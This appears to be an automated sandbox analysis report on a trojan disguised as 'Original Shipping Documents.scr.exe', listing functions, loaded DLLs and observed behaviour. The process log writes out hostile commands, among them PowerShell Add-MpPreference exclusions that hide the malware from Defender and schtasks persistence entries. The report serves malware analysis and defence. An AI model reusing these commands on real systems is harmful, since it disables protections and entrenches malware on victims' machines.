Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A92F28	8_2_01A92F28
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A70F30	8_2_01A70F30
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF2F30	8_2_01AF2F30
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC4F40	8_2_01AC4F40
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0CE93	8_2_01B0CE93
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A62E90	8_2_01A62E90
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0EEDB	8_2_01B0EEDB
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0EE26	8_2_01B0EE26
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A50E59	8_2_01A50E59
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A5B1B0	8_2_01A5B1B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A8516C	8_2_01A8516C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3F172	8_2_01A3F172
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B1B16B	8_2_01B1B16B
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0F0E0	8_2_01B0F0E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B070E9	8_2_01B070E9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFF0CC	8_2_01AFF0CC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A570C0	8_2_01A570C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A9739A	8_2_01A9739A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0132D	8_2_01B0132D
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A3D34C	8_2_01A3D34C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A552A0	8_2_01A552A0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF12ED	8_2_01AF12ED
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6B2C0	8_2_01A6B2C0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AED5B0	8_2_01AED5B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B07571	8_2_01B07571
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0F43F	8_2_01B0F43F
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A41460	8_2_01A41460
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0F7B0	8_2_01B0F7B0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B016CC	8_2_01B016CC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AE5910	8_2_01AE5910
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A59950	8_2_01A59950
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6B950	8_2_01A6B950
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A538E0	8_2_01A538E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01ABD800	8_2_01ABD800
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6FB80	8_2_01A6FB80
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A8DBF9	8_2_01A8DBF9
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC5BF0	8_2_01AC5BF0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0FB76	8_2_01B0FB76
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AEDAAC	8_2_01AEDAAC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A95AA0	8_2_01A95AA0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AF1AA3	8_2_01AF1AA3
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AFDAC6	8_2_01AFDAC6
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC3A6C	8_2_01AC3A6C
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B07A46	8_2_01B07A46
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0FA49	8_2_01B0FA49
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A6FDC0	8_2_01A6FDC0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B07D73	8_2_01B07D73
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A53D40	8_2_01A53D40
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B01D5A	8_2_01B01D5A
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0FCF2	8_2_01B0FCF2
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01AC9C32	8_2_01AC9C32
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0FFB1	8_2_01B0FFB1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A51F92	8_2_01A51F92
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01B0FF09	8_2_01B0FF09
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A59EB0	8_2_01A59EB0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 9_2_01263E28	9_2_01263E28
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 9_2_0126F1A4	9_2_0126F1A4
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 9_2_01267018	9_2_01267018
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01130100	13_2_01130100
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01186000	13_2_01186000
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011C02C0	13_2_011C02C0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01140535	13_2_01140535
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01164750	13_2_01164750
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01140770	13_2_01140770
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0113C7C0	13_2_0113C7C0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115C6E0	13_2_0115C6E0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01156962	13_2_01156962
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011429A0	13_2_011429A0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0114A840	13_2_0114A840
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01142840	13_2_01142840
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01178890	13_2_01178890
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011268B8	13_2_011268B8
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0116E8F0	13_2_0116E8F0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0113EA80	13_2_0113EA80
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0114AD00	13_2_0114AD00
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0114ED7A	13_2_0114ED7A
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01158DBF	13_2_01158DBF
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01148DC0	13_2_01148DC0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0113ADE0	13_2_0113ADE0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01140C00	13_2_01140C00
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01130CF2	13_2_01130CF2
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01160F30	13_2_01160F30
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01182F28	13_2_01182F28
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011B4F40	13_2_011B4F40
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011BEFA0	13_2_011BEFA0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01132FC8	13_2_01132FC8
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01140E59	13_2_01140E59
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01152E90	13_2_01152E90
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0112F172	13_2_0112F172
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0117516C	13_2_0117516C
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0114B1B0	13_2_0114B1B0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0112D34C	13_2_0112D34C
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011433F3	13_2_011433F3
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011452A0	13_2_011452A0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115B2C0	13_2_0115B2C0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115D2F0	13_2_0115D2F0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01131460	13_2_01131460
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01143497	13_2_01143497
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011874E0	13_2_011874E0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0114B730	13_2_0114B730
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01149950	13_2_01149950
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115B950	13_2_0115B950
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01145990	13_2_01145990
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011AD800	13_2_011AD800
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011438E0	13_2_011438E0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115FB80	13_2_0115FB80
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011B5BF0	13_2_011B5BF0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0117DBF9	13_2_0117DBF9
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011B3A6C	13_2_011B3A6C
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01143D40	13_2_01143D40
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0115FDC0	13_2_0115FDC0
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011B9C32	13_2_011B9C32
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01159C20	13_2_01159C20
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01141F92	13_2_01141F92
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01149EB0	13_2_01149EB0

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: String function: 011AEA12 appears 37 times
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: String function: 01187E54 appears 97 times
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: String function: 01A97E54 appears 102 times
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: String function: 01ACF290 appears 105 times
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: String function: 01ABEA12 appears 86 times
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: String function: 01A3B970 appears 278 times
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: String function: 01A85130 appears 58 times

Sample file is different than original file name gathered from version info

Source: Original Shipping Documents.scr.exe, 00000000.00000002.1434724360.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe, 00000000.00000000.1379308557.0000000000CF1000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedfxE.exe@ vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe, 00000000.00000002.1477840807.0000000009960000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe, 00000008.00000002.1743279814.0000000001B3D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.000000000177F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSeCEditj% vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.0000000001768000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSeCEditj% vs Original Shipping Documents.scr.exe
Source: Original Shipping Documents.scr.exe	Binary or memory string: OriginalFilenamedfxE.exe@ vs Original Shipping Documents.scr.exe

Uses 32bit PE files

Source: Original Shipping Documents.scr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: Original Shipping Documents.scr.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: xHOAJKcJeCXuc.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, q4RPYX9Q3GcYEGPgYY.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, q4RPYX9Q3GcYEGPgYY.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, q4RPYX9Q3GcYEGPgYY.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, Rub6rxeXynuOkRKaly.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, Rub6rxeXynuOkRKaly.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@26/16@15/9

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Mutant created: \Sessions\1\BaseNamedObjects\RmQvqpbPlHkbEvKha
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3216:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8100:120:WilError_03

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File created: C:\Users\user\AppData\Local\Temp\tmp1E8.tmp

Jump to behavior

Source: Original Shipping Documents.scr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Original Shipping Documents.scr.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Original Shipping Documents.scr.exe	Virustotal: Detection: 36%
Source: Original Shipping Documents.scr.exe	ReversingLabs: Detection: 75%

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File read: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1E8.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1FA1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
Source: C:\Windows\System32\conhost.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\SecEdit.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1E8.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Users\user\Desktop\Original Shipping Documents.scr.exe "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xHOAJKcJeCXuc" /XML "C:\Users\user\AppData\Local\Temp\tmp1FA1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Process created: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe "C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe"	Jump to behavior
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"
Source: C:\Windows\SysWOW64\SecEdit.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
